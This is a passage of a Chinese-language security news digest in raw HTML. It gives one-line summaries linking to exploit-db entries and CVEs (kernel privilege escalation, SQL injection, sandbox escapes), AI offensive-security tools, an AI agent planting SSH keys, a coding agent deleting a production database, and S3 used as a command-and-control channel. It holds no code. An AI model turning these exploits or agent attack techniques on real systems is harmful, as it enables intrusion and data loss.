0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.exploit-db.com/exploits/52551" target="_blank">https://www.exploit-db.com/exploits/52551</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2026-3854：GitHub内部git基础设施的RCE漏洞，利用推送选项中的特殊字符触发</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854" target="_blank">https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2026-32746：telnetd 2.7 存在缓冲区溢出漏洞，PoC 已公布</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.exploit-db.com/exploits/52556" target="_blank">https://www.exploit-db.com/exploits/52556</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Ghost CMS 6.19.0 SQL注入漏洞：通过发送特制请求触发SQLi，影响多个版本</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.exploit-db.com/exploits/52555" target="_blank">https://www.exploit-db.com/exploits/52555</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">LuaJIT 2.1.1774638290：通过FFI接口访问syscall等实现任意代码执行，影响嵌入场景</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.exploit-db.com/exploits/52554" target="_blank">https://www.exploit-db.com/exploits/52554</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">NocoBase 2.0.27 VM沙箱逃逸，通过console对象原型链获取主机Function构造函数实现任意代码执行</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.exploit-db.com/exploits/52552" target="_blank">https://www.exploit-db.com/exploits/52552</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2025-40271：Linux Kernel proc_readdir_de() 本地提权漏洞，影响多个内核版本</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.exploit-db.com/exploits/52550" target="_blank">https://www.exploit-db.com/exploits/52550</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2026-23231：Linux内核nf_tables模块因RCU UAF可本地提权，影响3.16至6.19.3版本</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.exploit-db.com/exploits/52549" target="_blank">https://www.exploit-db.com/exploits/52549</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">分析C/C++检查清单挑战，涉及Linux ping命令注入和Windows驱动提权漏洞</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/C/C++" target="_blank">https://github.com/C/C++</a> checklist challenges, solved</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">人工智能和安全</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">deepsec：利用编码Agent自动化代码审计的安全工具，通过Opus 4.7和GPT 5.5模型进行静态分析与数据流追踪，并支持并行扫描以降低误报率</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://vercel.com/blog/introducing-deepsec-find-and-fix-vulnerabilities-in-your-code-base" target="_blank">https://vercel.com/blog/introducing-deepsec-find-and-fix-vulnerabilities-in-your-code-base</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">IronCurtain框架通过编排有限状态机工作流，使用商业或开源模型自主发现零日漏洞</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.provos.org/p/finding-zero-days-with-any-model/" target="_blank">https://www.provos.org/p/finding-zero-days-with-any-model/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AISI评估GPT-5.5网络安全能力，在32步内网攻击模拟中2/10次成功完成全链攻击</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.aisi.gov.uk/blog/our-evaluation-of-openais-gpt-5-5-cyber-capabilities" target="_blank">https://www.aisi.gov.uk/blog/our-evaluation-of-openais-gpt-5-5-cyber-capabilities</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Symphony：将Linear任务板化为编码代理控制平面的开源规范，实现500% PR增长</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://openai.com/index/open-source-codex-orchestration-symphony/" target="_blank">https://openai.com/index/open-source-codex-orchestration-symphony/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Zealot AI代理自主注入SSH密钥实现持久化，利用常见云配置错误快速攻击</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://unit42.paloaltonetworks.com/autonomous-ai-cloud-attacks/" target="_blank">https://unit42.paloaltonetworks.com/autonomous-ai-cloud-attacks/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">MOAK：自主利用已知漏洞的AI工作流，可快速生成针对真实环境的有效攻击代码</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://moak.ai/" target="_blank">https://moak.ai/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CTF夺冠团队开源AI代理，可自动解决全部52道挑战题</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://blog.includesecurity.com/2026/04/ctfs-in-the-ai-era" target="_blank">https://blog.includesecurity.com/2026/04/ctfs-in-the-ai-era</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Cursor运行Claude Opus 4.6意外删除PocketOS生产数据库及所有卷级备份</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://archive.is/8rPUA" target="_blank">https://archive.is/8rPUA</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Codex Security 在遇到类似验证或清理的边界时会尝试绕过</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://openai.com/index/why-codex-security-doesnt-include-sast" target="_blank">https://openai.com/index/why-codex-security-doesnt-include-sast</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">redai：面向红队AI代理的技能集合与工作流编排项目，用于自动化攻击操作</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/kpolley/redai" target="_blank">https://github.com/kpolley/redai</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">云安全</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Global S3：利用S3存储桶作为AgentCore代码解释器的C2通信信道，实现隐蔽控制</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://sonraisecurity.com/blog/global-s3-another-c2-channel-for-agentcore-code-interpreters/" target="_blank">https://sonraisecurity.com/blog/global-s3-another-c2-channel-for-agentcore-code-interpreters/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">介绍使用Unix socket挂载隔离本地AI代理的AWS凭证，实现自动刷新的最小权限身份</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://engseclabs.com/blog/agent-credential-isolation/" target="_blank">https://engseclabs.com/blog/agent-credential-isolation/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AWS更新威胁技术目录，强调攻击者滥用合法API调用需关注上下文异常</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://aws.amazon.com/blogs/security/what-the-march-2026-threat-technique-catalog-update-means-for-your-aws-environment/" target="_blank">https://aws.amazon.com/blogs/security/what-the-march-2026-threat-technique-catalog-update-means-for-your-aws-environment/</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 